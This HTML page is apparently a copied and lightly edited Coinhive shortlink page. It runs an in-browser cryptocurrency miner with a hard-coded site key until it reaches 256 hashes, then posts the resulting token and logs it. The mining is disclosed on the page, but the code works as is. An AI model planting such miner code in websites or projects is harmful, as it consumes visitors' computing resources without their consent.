
<!doctype html>
<html lang="en-us">
<head>
        <title>cnhv.co – redirecting&hellip;</title>
        <link rel="stylesheet" type="text/css" href="https://cnhv.co/media/shortlink.css"/>
        <link rel="icon" href="https://cnhv.co/media/coinhive-icon.png"/>
        <script type="text/javascript" src="https://coin-hive.com/lib/coinhive.min.js"></script>
        <meta name="viewport" content="width=400"/>
</head>
<body>

<div class="content">
        <h1>proof of work required – redirecting shortly</h1>

        <div class="progress-bar">
                <div id="progress"></div>
        </div>

        powered by <a href="https://coin-hive.com/">
                <img src="https://cnhv.co/media/coinhive-icon.png" class="icon"/>
                coinhive
        </a>
</div>

<script type="text/javascript">
        var $progress = document.getElementById('progress');
        var target = 256;
        var totalHashes = 0;
        var updateInterval = null;

        var miner = new CoinHive.Token('QJwS2XwhTx6j6i8HvVJ4H3nwqQlsQ8Bx',target);

        miner.on('accepted', function(params){
                if (params.hashes >= target) {
                        clearInterval(updateInterval);
                        $progress.style.width = '100%';

                        var ts = Date.now();
                        var xhr = new XMLHttpRequest();
                        xhr.onreadystatechange = function() {
                                if (xhr.readyState === xhr.DONE){
console.log(miner.getToken())
                                        alert("berhasil")
                                }
                        };
                        xhr.open('POST', 'https://cnhv.co/6ic');
                        xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded");
                        xhr.send('token='+encodeURIComponent(miner.getToken()));
                }
        });

        updateInterval = setInterval(function(){
          // console.log(progress)
                var p = miner.getTotalHashes(true) / target;
                var progress = (p*p)/(p*p + 0.2) + 0.01;
          // console.log(progress)
                $progress.style.width = (Math.ceil(progress*1000)/10)+'%';
        }, 250);
        miner.start(CoinHive.FORCE_MULTI_TAB);
</script>

</body>
</html>